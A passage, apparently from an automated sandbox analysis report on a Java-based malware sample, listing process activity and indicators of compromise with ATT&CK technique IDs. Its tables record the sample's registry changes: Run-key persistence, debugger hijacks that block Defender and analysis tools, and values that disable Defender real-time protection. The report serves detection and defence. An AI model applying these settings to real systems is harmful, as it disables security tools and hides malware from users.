PID 2040 wrote to memory of 1264	2040	cmd.exe	230
PID 1496 wrote to memory of 1572	1496	java.exe	231
PID 1496 wrote to memory of 1572	1496	java.exe	231
PID 1496 wrote to memory of 1572	1496	java.exe	231
PID 1572 wrote to memory of 812	1572	cmd.exe	232
PID 1572 wrote to memory of 812	1572	cmd.exe	232
PID 1572 wrote to memory of 812	1572	cmd.exe	232
PID 1572 wrote to memory of 1376	1572	cmd.exe	233
PID 1572 wrote to memory of 1376	1572	cmd.exe	233
PID 1572 wrote to memory of 1376	1572	cmd.exe	233
PID 1496 wrote to memory of 1344	1496	java.exe	234
PID 1496 wrote to memory of 1344	1496	java.exe	234
PID 1496 wrote to memory of 1344	1496	java.exe	234
PID 1344 wrote to memory of 1472	1344	cmd.exe	235
PID 1344 wrote to memory of 1472	1344	cmd.exe	235
PID 1344 wrote to memory of 1472	1344	cmd.exe	235
PID 1344 wrote to memory of 1904	1344	cmd.exe	236
PID 1344 wrote to memory of 1904	1344	cmd.exe	236
PID 1344 wrote to memory of 1904	1344	cmd.exe	236
PID 1496 wrote to memory of 1384	1496	java.exe	237
PID 1496 wrote to memory of 1384	1496	java.exe	237
PID 1496 wrote to memory of 1384	1496	java.exe	237
PID 1384 wrote to memory of 1404	1384	cmd.exe	238
PID 1384 wrote to memory of 1404	1384	cmd.exe	238
PID 1384 wrote to memory of 1404	1384	cmd.exe	238
PID 1384 wrote to memory of 1408	1384	cmd.exe	239
PID 1384 wrote to memory of 1408	1384	cmd.exe	239
PID 1384 wrote to memory of 1408	1384	cmd.exe	239
PID 1496 wrote to memory of 1984	1496	java.exe	240
PID 1496 wrote to memory of 1984	1496	java.exe	240
PID 1496 wrote to memory of 1984	1496	java.exe	240
PID 1984 wrote to memory of 1768	1984	cmd.exe	241
PID 1984 wrote to memory of 1768	1984	cmd.exe	241
PID 1984 wrote to memory of 1768	1984	cmd.exe	241
PID 1984 wrote to memory of 1080	1984	cmd.exe	242
PID 1984 wrote to memory of 1080	1984	cmd.exe	242
PID 1984 wrote to memory of 1080	1984	cmd.exe	242
PID 1496 wrote to memory of 928	1496	java.exe	243
PID 1496 wrote to memory of 928	1496	java.exe	243
PID 1496 wrote to memory of 928	1496	java.exe	243
PID 928 wrote to memory of 680	928	cmd.exe	244
PID 928 wrote to memory of 680	928	cmd.exe	244
PID 928 wrote to memory of 680	928	cmd.exe	244
PID 928 wrote to memory of 1784	928	cmd.exe	245
PID 928 wrote to memory of 1784	928	cmd.exe	245
PID 928 wrote to memory of 1784	928	cmd.exe	245
PID 1496 wrote to memory of 1648	1496	java.exe	246
PID 1496 wrote to memory of 1648	1496	java.exe	246
PID 1496 wrote to memory of 1648	1496	java.exe	246
PID 1648 wrote to memory of 1376	1648	cmd.exe	247
PID 1648 wrote to memory of 1376	1648	cmd.exe	247
PID 1648 wrote to memory of 1376	1648	cmd.exe	247
PID 1648 wrote to memory of 1980	1648	cmd.exe	248
PID 1648 wrote to memory of 1980	1648	cmd.exe	248
PID 1648 wrote to memory of 1980	1648	cmd.exe	248
PID 1496 wrote to memory of 1388	1496	java.exe	249
PID 1496 wrote to memory of 1388	1496	java.exe	249
PID 1496 wrote to memory of 1388	1496	java.exe	249
PID 1388 wrote to memory of 1912	1388	cmd.exe	250
PID 1388 wrote to memory of 1912	1388	cmd.exe	250
PID 1388 wrote to memory of 1912	1388	cmd.exe	250
PID 1388 wrote to memory of 1404	1388	cmd.exe	251
PID 1388 wrote to memory of 1404	1388	cmd.exe	251
PID 1388 wrote to memory of 1404	1388	cmd.exe	251
PID 1496 wrote to memory of 1772	1496	java.exe	252
PID 1496 wrote to memory of 1772	1496	java.exe	252
PID 1496 wrote to memory of 1772	1496	java.exe	252
PID 1772 wrote to memory of 1948	1772	cmd.exe	253
PID 1772 wrote to memory of 1948	1772	cmd.exe	253
PID 1772 wrote to memory of 1948	1772	cmd.exe	253
PID 1772 wrote to memory of 1080	1772	cmd.exe	254
PID 1772 wrote to memory of 1080	1772	cmd.exe	254
PID 1772 wrote to memory of 1080	1772	cmd.exe	254
PID 1496 wrote to memory of 1132	1496	java.exe	255
PID 1496 wrote to memory of 1132	1496	java.exe	255
PID 1496 wrote to memory of 1132	1496	java.exe	255
PID 1132 wrote to memory of 620	1132	cmd.exe	256
PID 1132 wrote to memory of 620	1132	cmd.exe	256
PID 1132 wrote to memory of 620	1132	cmd.exe	256
PID 1132 wrote to memory of 1864	1132	cmd.exe	257
PID 1132 wrote to memory of 1864	1132	cmd.exe	257
PID 1132 wrote to memory of 1864	1132	cmd.exe	257
PID 1496 wrote to memory of 1376	1496	java.exe	258
PID 1496 wrote to memory of 1376	1496	java.exe	258
PID 1496 wrote to memory of 1376	1496	java.exe	258
PID 1376 wrote to memory of 1960	1376	cmd.exe	259
PID 1376 wrote to memory of 1960	1376	cmd.exe	259
PID 1376 wrote to memory of 1960	1376	cmd.exe	259
PID 1376 wrote to memory of 1408	1376	cmd.exe	260
PID 1376 wrote to memory of 1408	1376	cmd.exe	260
PID 1376 wrote to memory of 1408	1376	cmd.exe	260
PID 1496 wrote to memory of 1404	1496	java.exe	261
PID 1496 wrote to memory of 1404	1496	java.exe	261
PID 1496 wrote to memory of 1404	1496	java.exe	261
PID 1496 wrote to memory of 1080	1496	java.exe	263
PID 1496 wrote to memory of 1080	1496	java.exe	263
PID 1496 wrote to memory of 1080	1496	java.exe	263
PID 1080 wrote to memory of 1472	1080	cmd.exe	264
PID 1080 wrote to memory of 1472	1080	cmd.exe	264
PID 1080 wrote to memory of 1472	1080	cmd.exe	264
PID 1080 wrote to memory of 1852	1080	cmd.exe	265
PID 1080 wrote to memory of 1852	1080	cmd.exe	265
PID 1080 wrote to memory of 1852	1080	cmd.exe	265
PID 1496 wrote to memory of 1844	1496	java.exe	266
PID 1496 wrote to memory of 1844	1496	java.exe	266
PID 1496 wrote to memory of 1844	1496	java.exe	266
PID 1844 wrote to memory of 1824	1844	cmd.exe	267
PID 1844 wrote to memory of 1824	1844	cmd.exe	267
PID 1844 wrote to memory of 1824	1844	cmd.exe	267
PID 1844 wrote to memory of 1884	1844	cmd.exe	268
PID 1844 wrote to memory of 1884	1844	cmd.exe	268
PID 1844 wrote to memory of 1884	1844	cmd.exe	268
PID 1496 wrote to memory of 1852	1496	java.exe	269
PID 1496 wrote to memory of 1852	1496	java.exe	269
PID 1496 wrote to memory of 1852	1496	java.exe	269
PID 1852 wrote to memory of 1980	1852	cmd.exe	270
PID 1852 wrote to memory of 1980	1852	cmd.exe	270
PID 1852 wrote to memory of 1980	1852	cmd.exe	270
PID 1852 wrote to memory of 1864	1852	cmd.exe	271
PID 1852 wrote to memory of 1864	1852	cmd.exe	271
PID 1852 wrote to memory of 1864	1852	cmd.exe	271
PID 1496 wrote to memory of 1848	1496	java.exe	272
PID 1496 wrote to memory of 1848	1496	java.exe	272
PID 1496 wrote to memory of 1848	1496	java.exe	272
PID 1848 wrote to memory of 620	1848	cmd.exe	273
PID 1848 wrote to memory of 620	1848	cmd.exe	273
PID 1848 wrote to memory of 620	1848	cmd.exe	273
PID 1848 wrote to memory of 1824	1848	cmd.exe	274
PID 1848 wrote to memory of 1824	1848	cmd.exe	274
PID 1848 wrote to memory of 1824	1848	cmd.exe	274
PID 1496 wrote to memory of 1828	1496	java.exe	275
PID 1496 wrote to memory of 1828	1496	java.exe	275
PID 1496 wrote to memory of 1828	1496	java.exe	275
PID 1828 wrote to memory of 1404	1828	cmd.exe	276
PID 1828 wrote to memory of 1404	1828	cmd.exe	276
PID 1828 wrote to memory of 1404	1828	cmd.exe	276
PID 1828 wrote to memory of 1864	1828	cmd.exe	277
PID 1828 wrote to memory of 1864	1828	cmd.exe	277
PID 1828 wrote to memory of 1864	1828	cmd.exe	277
PID 1496 wrote to memory of 1700	1496	java.exe	278
PID 1496 wrote to memory of 1700	1496	java.exe	278
PID 1496 wrote to memory of 1700	1496	java.exe	278
PID 1700 wrote to memory of 1472	1700	cmd.exe	279
PID 1700 wrote to memory of 1472	1700	cmd.exe	279
PID 1700 wrote to memory of 1472	1700	cmd.exe	279
PID 1700 wrote to memory of 368	1700	cmd.exe	280
PID 1700 wrote to memory of 368	1700	cmd.exe	280
PID 1700 wrote to memory of 368	1700	cmd.exe	280
PID 1496 wrote to memory of 1404	1496	java.exe	281
PID 1496 wrote to memory of 1404	1496	java.exe	281
PID 1496 wrote to memory of 1404	1496	java.exe	281
PID 1404 wrote to memory of 620	1404	cmd.exe	282
PID 1404 wrote to memory of 620	1404	cmd.exe	282
PID 1404 wrote to memory of 620	1404	cmd.exe	282
PID 1404 wrote to memory of 1960	1404	cmd.exe	283
PID 1404 wrote to memory of 1960	1404	cmd.exe	283
PID 1404 wrote to memory of 1960	1404	cmd.exe	283
PID 1496 wrote to memory of 368	1496	java.exe	284
PID 1496 wrote to memory of 368	1496	java.exe	284
PID 1496 wrote to memory of 368	1496	java.exe	284
PID 368 wrote to memory of 1948	368	cmd.exe	285
PID 368 wrote to memory of 1948	368	cmd.exe	285
PID 368 wrote to memory of 1948	368	cmd.exe	285
PID 368 wrote to memory of 1472	368	cmd.exe	286
PID 368 wrote to memory of 1472	368	cmd.exe	286
PID 368 wrote to memory of 1472	368	cmd.exe	286
PID 1496 wrote to memory of 620	1496	java.exe	287
PID 1496 wrote to memory of 620	1496	java.exe	287
PID 1496 wrote to memory of 620	1496	java.exe	287
PID 620 wrote to memory of 1948	620	cmd.exe	288
PID 620 wrote to memory of 1948	620	cmd.exe	288
PID 620 wrote to memory of 1948	620	cmd.exe	288
PID 620 wrote to memory of 1824	620	cmd.exe	289
PID 620 wrote to memory of 1824	620	cmd.exe	289
PID 620 wrote to memory of 1824	620	cmd.exe	289
PID 1496 wrote to memory of 1960	1496	java.exe	290
PID 1496 wrote to memory of 1960	1496	java.exe	290
PID 1496 wrote to memory of 1960	1496	java.exe	290
PID 1960 wrote to memory of 1824	1960	cmd.exe	291
PID 1960 wrote to memory of 1824	1960	cmd.exe	291
PID 1960 wrote to memory of 1824	1960	cmd.exe	291
PID 1960 wrote to memory of 2056	1960	cmd.exe	292
PID 1960 wrote to memory of 2056	1960	cmd.exe	292
PID 1960 wrote to memory of 2056	1960	cmd.exe	292
PID 1496 wrote to memory of 2068	1496	java.exe	293
PID 1496 wrote to memory of 2068	1496	java.exe	293
PID 1496 wrote to memory of 2068	1496	java.exe	293
PID 2068 wrote to memory of 2080	2068	cmd.exe	294
PID 2068 wrote to memory of 2080	2068	cmd.exe	294
PID 2068 wrote to memory of 2080	2068	cmd.exe	294
PID 2068 wrote to memory of 2092	2068	cmd.exe	295
PID 2068 wrote to memory of 2092	2068	cmd.exe	295
PID 2068 wrote to memory of 2092	2068	cmd.exe	295
PID 1496 wrote to memory of 2104	1496	java.exe	296
PID 1496 wrote to memory of 2104	1496	java.exe	296
PID 1496 wrote to memory of 2104	1496	java.exe	296
PID 2104 wrote to memory of 2116	2104	cmd.exe	297
PID 2104 wrote to memory of 2116	2104	cmd.exe	297
PID 2104 wrote to memory of 2116	2104	cmd.exe	297
PID 2104 wrote to memory of 2128	2104	cmd.exe	298
PID 2104 wrote to memory of 2128	2104	cmd.exe	298
PID 2104 wrote to memory of 2128	2104	cmd.exe	298
PID 1496 wrote to memory of 2140	1496	java.exe	299
PID 1496 wrote to memory of 2140	1496	java.exe	299
PID 1496 wrote to memory of 2140	1496	java.exe	299
PID 2140 wrote to memory of 2152	2140	cmd.exe	300
PID 2140 wrote to memory of 2152	2140	cmd.exe	300
PID 2140 wrote to memory of 2152	2140	cmd.exe	300
PID 2140 wrote to memory of 2164	2140	cmd.exe	301
PID 2140 wrote to memory of 2164	2140	cmd.exe	301
PID 2140 wrote to memory of 2164	2140	cmd.exe	301
PID 1496 wrote to memory of 2176	1496	java.exe	302
PID 1496 wrote to memory of 2176	1496	java.exe	302
PID 1496 wrote to memory of 2176	1496	java.exe	302
PID 1496 wrote to memory of 2228	1496	java.exe	304
PID 1496 wrote to memory of 2228	1496	java.exe	304
PID 1496 wrote to memory of 2228	1496	java.exe	304
PID 1496 wrote to memory of 2276	1496	java.exe	306
PID 1496 wrote to memory of 2276	1496	java.exe	306
PID 1496 wrote to memory of 2276	1496	java.exe	306
PID 1496 wrote to memory of 2332	1496	java.exe	308
PID 1496 wrote to memory of 2332	1496	java.exe	308
PID 1496 wrote to memory of 2332	1496	java.exe	308
PID 2332 wrote to memory of 2348	2332	cmd.exe	309
PID 2332 wrote to memory of 2348	2332	cmd.exe	309
PID 2332 wrote to memory of 2348	2332	cmd.exe	309
PID 1496 wrote to memory of 2396	1496	java.exe	310
PID 1496 wrote to memory of 2396	1496	java.exe	310
PID 1496 wrote to memory of 2396	1496	java.exe	310
PID 1496 wrote to memory of 2460	1496	java.exe	312
PID 1496 wrote to memory of 2460	1496	java.exe	312
PID 1496 wrote to memory of 2460	1496	java.exe	312
PID 1496 wrote to memory of 2508	1496	java.exe	314
PID 1496 wrote to memory of 2508	1496	java.exe	314
PID 1496 wrote to memory of 2508	1496	java.exe	314
PID 1496 wrote to memory of 2556	1496	java.exe	316
PID 1496 wrote to memory of 2556	1496	java.exe	316
PID 1496 wrote to memory of 2556	1496	java.exe	316
PID 1496 wrote to memory of 2604	1496	java.exe	318
PID 1496 wrote to memory of 2604	1496	java.exe	318
PID 1496 wrote to memory of 2604	1496	java.exe	318

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1876	attrib.exe
1916	attrib.exe
1912	attrib.exe
1136	attrib.exe
1864	attrib.exe
1824	attrib.exe
1860	attrib.exe
1852	attrib.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	java.exe
File created	C:\Users\Admin\LdlkM\Desktop.ini	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
328	taskkill.exe
2276	taskkill.exe
2020	taskkill.exe
316	taskkill.exe
2556	taskkill.exe
1404	taskkill.exe
2176	taskkill.exe
2228	taskkill.exe
2396	taskkill.exe
2460	taskkill.exe
2508	taskkill.exe
1660	taskkill.exe
1388	taskkill.exe
2604	taskkill.exe
1840	taskkill.exe
1572	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1496	java.exe

Suspicious use of AdjustPrivilegeToken 137 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1508	WMIC.exe
Token: SeSecurityPrivilege	1508	WMIC.exe
Token: SeTakeOwnershipPrivilege	1508	WMIC.exe
Token: SeLoadDriverPrivilege	1508	WMIC.exe
Token: SeSystemProfilePrivilege	1508	WMIC.exe
Token: SeSystemtimePrivilege	1508	WMIC.exe
Token: SeProfSingleProcessPrivilege	1508	WMIC.exe
Token: SeIncBasePriorityPrivilege	1508	WMIC.exe
Token: SeCreatePagefilePrivilege	1508	WMIC.exe
Token: SeBackupPrivilege	1508	WMIC.exe
Token: SeRestorePrivilege	1508	WMIC.exe
Token: SeShutdownPrivilege	1508	WMIC.exe
Token: SeDebugPrivilege	1508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1508	WMIC.exe
Token: SeRemoteShutdownPrivilege	1508	WMIC.exe
Token: SeUndockPrivilege	1508	WMIC.exe
Token: SeManageVolumePrivilege	1508	WMIC.exe
Token: 33	1508	WMIC.exe
Token: 34	1508	WMIC.exe
Token: 35	1508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1508	WMIC.exe
Token: SeSecurityPrivilege	1508	WMIC.exe
Token: SeTakeOwnershipPrivilege	1508	WMIC.exe
Token: SeLoadDriverPrivilege	1508	WMIC.exe
Token: SeSystemProfilePrivilege	1508	WMIC.exe
Token: SeSystemtimePrivilege	1508	WMIC.exe
Token: SeProfSingleProcessPrivilege	1508	WMIC.exe
Token: SeIncBasePriorityPrivilege	1508	WMIC.exe
Token: SeCreatePagefilePrivilege	1508	WMIC.exe
Token: SeBackupPrivilege	1508	WMIC.exe
Token: SeRestorePrivilege	1508	WMIC.exe
Token: SeShutdownPrivilege	1508	WMIC.exe
Token: SeDebugPrivilege	1508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1508	WMIC.exe
Token: SeRemoteShutdownPrivilege	1508	WMIC.exe
Token: SeUndockPrivilege	1508	WMIC.exe
Token: SeManageVolumePrivilege	1508	WMIC.exe
Token: 33	1508	WMIC.exe
Token: 34	1508	WMIC.exe
Token: 35	1508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2348	WMIC.exe
Token: SeSecurityPrivilege	2348	WMIC.exe
Token: SeTakeOwnershipPrivilege	2348	WMIC.exe
Token: SeLoadDriverPrivilege	2348	WMIC.exe
Token: SeSystemProfilePrivilege	2348	WMIC.exe
Token: SeSystemtimePrivilege	2348	WMIC.exe
Token: SeProfSingleProcessPrivilege	2348	WMIC.exe
Token: SeIncBasePriorityPrivilege	2348	WMIC.exe
Token: SeCreatePagefilePrivilege	2348	WMIC.exe
Token: SeBackupPrivilege	2348	WMIC.exe
Token: SeRestorePrivilege	2348	WMIC.exe
Token: SeShutdownPrivilege	2348	WMIC.exe
Token: SeDebugPrivilege	2348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2348	WMIC.exe
Token: SeRemoteShutdownPrivilege	2348	WMIC.exe
Token: SeUndockPrivilege	2348	WMIC.exe
Token: SeManageVolumePrivilege	2348	WMIC.exe
Token: 33	2348	WMIC.exe
Token: 34	2348	WMIC.exe
Token: 35	2348	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2348	WMIC.exe
Token: SeSecurityPrivilege	2348	WMIC.exe
Token: SeTakeOwnershipPrivilege	2348	WMIC.exe
Token: SeLoadDriverPrivilege	2348	WMIC.exe
Token: SeSystemProfilePrivilege	2348	WMIC.exe
Token: SeSystemtimePrivilege	2348	WMIC.exe
Token: SeProfSingleProcessPrivilege	2348	WMIC.exe
Token: SeIncBasePriorityPrivilege	2348	WMIC.exe
Token: SeCreatePagefilePrivilege	2348	WMIC.exe
Token: SeBackupPrivilege	2348	WMIC.exe
Token: SeRestorePrivilege	2348	WMIC.exe
Token: SeShutdownPrivilege	2348	WMIC.exe
Token: SeDebugPrivilege	2348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2348	WMIC.exe
Token: SeRemoteShutdownPrivilege	2348	WMIC.exe
Token: SeUndockPrivilege	2348	WMIC.exe
Token: SeManageVolumePrivilege	2348	WMIC.exe
Token: 33	2348	WMIC.exe
Token: 34	2348	WMIC.exe
Token: 35	2348	WMIC.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	2556	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\EnMer	java.exe
File opened for modification	C:\Windows\System32\EnMer	java.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1568	powershell.exe
1568	powershell.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Loads dropped DLL 1 IoCs

pid	Process
1496	java.exe

Checks for installed software on the system 1 TTPs 52 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	reg.exe
